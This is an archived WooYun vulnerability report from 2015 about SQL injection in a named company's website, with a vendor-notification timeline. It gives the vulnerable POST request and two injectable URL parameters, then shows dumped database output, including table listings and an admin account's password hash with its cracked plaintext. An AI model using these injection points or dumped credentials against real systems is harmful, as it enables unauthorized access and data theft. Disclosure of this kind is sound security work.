乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-20: 细节已通知厂商并且等待厂商处理中 2015-11-24: 厂商已经确认,细节仅向厂商公开 2015-12-04: 细节向核心白帽子及相关领域专家公开 2015-12-14: 细节向普通白帽子公开 2015-12-24: 细节向实习白帽子公开 2016-01-11: 细节向公众公开
活力健國際有限公司主站存在多处SQL注入(可獲取admin及用戶密碼)
第一处:POST注入
POST /content/layout/product/getProoductInfo.php HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=6Content-Length: 23Cookie: PHPSESSID=d7vjgbferqt9idrpurmm57jeq3Connection: keep-alivePragma: no-cacheCache-Control: no-cachedbTable=2036_a8_b6_c10_
第二处:http://**.**.**.**/content/index.php?lang=2&lv1=8&lv2=9参数lv2
第三处:http://**.**.**.**/content/index.php?lang=3&lv1=9&lv2=3&lv3=3参数lv3
current user: 'web91u1@localhost'current database: 'web91db1'Database: information_schema[17 tables]+---------------------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || KEY_COLUMN_USAGE || PROFILING || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+---------------------------------------+Database: web91db1[180 tables]+---------------------------------------+| News || NewsNode || NewsNode_seq || Password || 2036_a10_homeNews || 2036_a10_homeProduct || 2036_a10_homeYoutube || 2036_a10_mv || 2036_a10_seo || 2036_a10_sideBanner || 2036_a10_topIcon || 2036_a10_video || 2036_a10_youtube || 2036_a13_addTextField || 2036_a1_keyVisual || 2036_a1_promotion || 2036_a1_youtubeLink || 2036_a2_addTextField || 2036_a2_keyVisual || 2036_a3_addTextField || 2036_a3_keyVisual || 2036_a3_sellSpot || 2036_a4_addTextField || 2036_a4_button || 2036_a4_caseShare || 2036_a4_keyVisual || 2036_a5_addTextField || 2036_a5_keyVisual || 2036_a5_pageImage || 2036_a5_pageTxt || 2036_a5_radioProgramme_backup || 2036_a5_radioProgramme || 2036_a5_topic || 2036_a6_b13_disease || 2036_a6_b14_disease || 2036_a6_b15_disease || 2036_a6_b16_disease || 2036_a6_b17_disease || 2036_a6_b18_disease || 2036_a6_b19_disease || 2036_a6_b20_disease || 2036_a6_b21_disease || 2036_a6_b22_disease || 2036_a6_b23_disease || 2036_a6_b24_disease || 2036_a6_b25_disease || 2036_a6_disease || 2036_a6_keyVisual || 2036_a6_pageImage || 2036_a6_txtPic || 2036_a7_b10_addTextField || 2036_a7_b10_keyVisual || 2036_a7_b10_newsletter || 2036_a7_b11_addTextField || 2036_a7_b11_c14_addTextField || 2036_a7_b11_c14_keyVisual || 2036_a7_b11_c14_pageTxt || 2036_a7_b11_contactMethod || 2036_a7_b11_education || 2036_a7_b11_gender || 2036_a7_b11_keyVisual || 2036_a7_b11_occupation || 2036_a7_b11_pageTxt || 2036_a7_b11_reachUs || 2036_a7_b11_referralCompany || 2036_a7_b11_salary || 2036_a7_b11_symptom || 2036_a7_b12_button || 2036_a7_b12_googleMap || 2036_a7_b12_keyVisual || 2036_a7_b12_pageImage || 2036_a7_b12_pageTxt || 2036_a7_b12_txtPic || 2036_a7_b26_pageTxt || 2036_a7_b28_button || 2036_a7_b28_googleMap || 2036_a7_b28_keyVisual || 2036_a7_b28_pageImage || 2036_a7_b28_pageTxt || 2036_a7_b29_addTextField || 2036_a7_b29_keyVisual || 2036_a7_b29_pageTxt || 2036_a7_b29_symptom || 2036_a7_b30_addTextField || 2036_a7_b30_education || 2036_a7_b30_gender || 2036_a7_b30_keyVisual || 2036_a7_b30_pageTxt || 2036_a7_b30_symptom || 2036_a7_button || 2036_a7_keyVisual || 2036_a7_txtPic || 2036_a8_b6_c10_button || 2036_a8_b6_c10_product || 2036_a8_b6_c11_button || 2036_a8_b6_c11_product || 2036_a8_b6_c12_button || 2036_a8_b6_c12_product || 2036_a8_b6_c13_button || 2036_a8_b6_c13_product || 2036_a8_b6_c15_button || 2036_a8_b6_c15_product || 2036_a8_b6_c9_button || 2036_a8_b6_c9_product || 2036_a8_b6_keyVisual || 2036_a8_b6_pageImage || 2036_a8_b6_pageTxt || 2036_a8_b7_c4_button || 2036_a8_b7_c4_product || 2036_a8_b7_c5_button || 2036_a8_b7_c5_product || 2036_a8_b7_c6_button || 2036_a8_b7_c6_product || 2036_a8_b7_c7_button || 2036_a8_b7_c7_product || 2036_a8_b7_c8_button || 2036_a8_b7_c8_product || 2036_a8_b7_keyVisual || 2036_a8_b7_pageImage || 2036_a8_b7_pageTxt || 2036_a8_b8_keyVisual || 2036_a8_b8_pageImage || 2036_a8_b8_pageTxt || 2036_a8_b8_productKnowledgeContent || 2036_a8_b9_keyVisual || 2036_a8_b9_pageImage || 2036_a8_b9_promotion_backup || 2036_a8_b9_promotion || 2036_a9_b1_keyVisual || 2036_a9_b1_txtPic || 2036_a9_b27_addTextField || 2036_a9_b27_keyVisual || 2036_a9_b27_qualification || 2036_a9_b2_addTextField || 2036_a9_b2_award || 2036_a9_b2_keyVisual || 2036_a9_b2_qualification || 2036_a9_b2_txtPic || 2036_a9_b3_c1_pageImage || 2036_a9_b3_c1_pageTxt || 2036_a9_b3_c1_project || 2036_a9_b3_c2_pageImage || 2036_a9_b3_c2_pageTxt || 2036_a9_b3_c3_d1_contentTxtPic || 2036_a9_b3_c3_d2_contentTxtPic || 2036_a9_b3_c3_d3_contentTxtPic || 2036_a9_b3_c3_pageTxt || 2036_a9_b3_keyVisual || 2036_a9_b3_pageTxt || 2036_a9_b4_keyVisual || 2036_a9_b4_news || 2036_a9_b5_keyVisual || 2036_a9_b5_pageImageLang || 2036_a9_b5_pageImage || 2036_a9_b5_pageTxt || 2036_a9_pageImageLang || 2036_a_TNC || 2036_adminEmail || 2036_admin || 2036_contentTable || 2036_footer1Lv || 2036_footerAward || 2036_footerCopyright || 2036_footerNav || 2036_footerTNC || 2036_joinClubEmail || 2036_joinHealthClubMem || 2036_lang || 2036_layout || 2036_nav1Lv || 2036_nav2Lv || 2036_nav3Lv || 2036_nav4Lv || 2036_nav5Lv || 2036_picNum || 2036_topIcon || 2036_topLogo || allDate || allDay || allMonth |+---------------------------------------+
Table: Password[1 entry]+----+------------------------------------------+-----------+---------------------+---------------------+| id | password | loginName | createDate | lastModDate |+----+------------------------------------------+-----------+---------------------+---------------------+| 1 | 21232f297a57a5a743894a0e4a801fc3 (admin) | admin | 2009-08-29 21:10:31 | 2009-08-29 21:10:31 |+----+------------------------------------------+-----------+---------------------+---------------------+
NULL
危害等级:中
漏洞Rank:5
确认时间:2015-11-24 12:02
Referred to related parties.
暂无